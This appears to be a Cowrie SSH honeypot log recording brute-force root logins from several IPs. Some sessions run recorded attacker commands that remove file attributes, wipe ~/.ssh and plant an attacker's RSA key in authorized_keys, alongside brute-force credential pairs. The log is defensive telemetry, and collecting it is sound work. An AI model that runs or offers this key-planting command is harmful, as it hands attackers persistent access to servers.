{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:00:21.312793Z","src_ip":"152.32.129.236","session":"04d96e3e4e51"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:21.513985Z","src_ip":"152.32.129.236","session":"04d96e3e4e51"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:21.573307Z","src_ip":"152.32.129.236","session":"110c3154e320"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47122,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c829a3a1615","protocol":"ssh","message":"New connection: 43.156.132.147:47122 (1.2.3.4:22) [session: 1c829a3a1615]","sensor":"my-vps","timestamp":"2025-09-09T01:00:50.593406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:50.594461Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:50.838253Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.login.success","username":"root","password":"Mm123456","message":"login attempt [root/Mm123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:00:51.853929Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:00:52.405014Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:00:52.405704Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:00:52.406449Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:52.651546Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:00:53.156563Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.157234Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.403013Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.403860Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47134,"dst_ip":"1.2.3.4","dst_port":22,"session":"71007ca9c42b","protocol":"ssh","message":"New connection: 43.156.132.147:47134 (1.2.3.4:22) [session: 71007ca9c42b]","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.661057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.661916Z","src_ip":"43.156.132.147","session":"71007ca9c42b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:53.928438Z","src_ip":"43.156.132.147","session":"71007ca9c42b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:00:55.000011Z","src_ip":"43.156.132.147","session":"71007ca9c42b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:56.262056Z","src_ip":"43.156.132.147","session":"71007ca9c42b"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47144,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df1512d9754","protocol":"ssh","message":"New connection: 43.156.132.147:47144 (1.2.3.4:22) [session: 0df1512d9754]","sensor":"my-vps","timestamp":"2025-09-09T01:00:56.506279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:00:56.507143Z","src_ip":"43.156.132.147","session":"0df1512d9754"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:00:56.752233Z","src_ip":"43.156.132.147","session":"0df1512d9754"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:00:57.774135Z","src_ip":"43.156.132.147","session":"0df1512d9754"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:58.020581Z","src_ip":"43.156.132.147","session":"1c829a3a1615"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:00:58.021715Z","src_ip":"43.156.132.147","session":"0df1512d9754"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":57226,"dst_ip":"1.2.3.4","dst_port":22,"session":"8114fb013654","protocol":"ssh","message":"New connection: 152.32.129.236:57226 (1.2.3.4:22) [session: 8114fb013654]","sensor":"my-vps","timestamp":"2025-09-09T01:01:31.817085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:01:31.817933Z","src_ip":"152.32.129.236","session":"8114fb013654"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:01:32.073330Z","src_ip":"152.32.129.236","session":"8114fb013654"}
{"eventid":"cowrie.login.failed","username":"public","password":"public123","message":"login attempt [public/public123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:01:33.135606Z","src_ip":"152.32.129.236","session":"8114fb013654"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:01:34.393150Z","src_ip":"152.32.129.236","session":"8114fb013654"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":36664,"dst_ip":"1.2.3.4","dst_port":22,"session":"5019dd93ced0","protocol":"ssh","message":"New connection: 152.32.129.236:36664 (1.2.3.4:22) [session: 5019dd93ced0]","sensor":"my-vps","timestamp":"2025-09-09T01:02:51.844707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:02:51.845507Z","src_ip":"152.32.129.236","session":"5019dd93ced0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:02:52.668507Z","src_ip":"152.32.129.236","session":"5019dd93ced0"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:02:53.497558Z","src_ip":"152.32.129.236","session":"5019dd93ced0"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":49190,"dst_ip":"1.2.3.4","dst_port":22,"session":"57defa66bc35","protocol":"ssh","message":"New connection: 5.202.105.236:49190 (1.2.3.4:22) [session: 57defa66bc35]","sensor":"my-vps","timestamp":"2025-09-09T01:02:53.771216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:02:53.776807Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:02:53.934975Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.login.success","username":"root","password":"Ky123456.","message":"login attempt [root/Ky123456.] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:02:54.539763Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:54.696014Z","src_ip":"152.32.129.236","session":"5019dd93ced0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:02:54.895230Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:02:54.896020Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:02:54.897204Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.049696Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:02:55.383543Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.384423Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.554887Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.555808Z","src_ip":"5.202.105.236","session":"57defa66bc35"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":49726,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cbd519efb0","protocol":"ssh","message":"New connection: 5.202.105.236:49726 (1.2.3.4:22) [session: 11cbd519efb0]","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.663455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.664658Z","src_ip":"5.202.105.236","session":"11cbd519efb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:02:55.821108Z","src_ip":"5.202.105.236","session":"11cbd519efb0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:02:56.460628Z","src_ip":"5.202.105.236","session":"11cbd519efb0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:02:57.620834Z","src_ip":"5.202.105.236","session":"11cbd519efb0"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":50384,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0d956a0d925","protocol":"ssh","message":"New connection: 5.202.105.236:50384 (1.2.3.4:22) [session: a0d956a0d925]","sensor":"my-vps","timestamp":"2025-09-09T01:02:57.761649Z"}
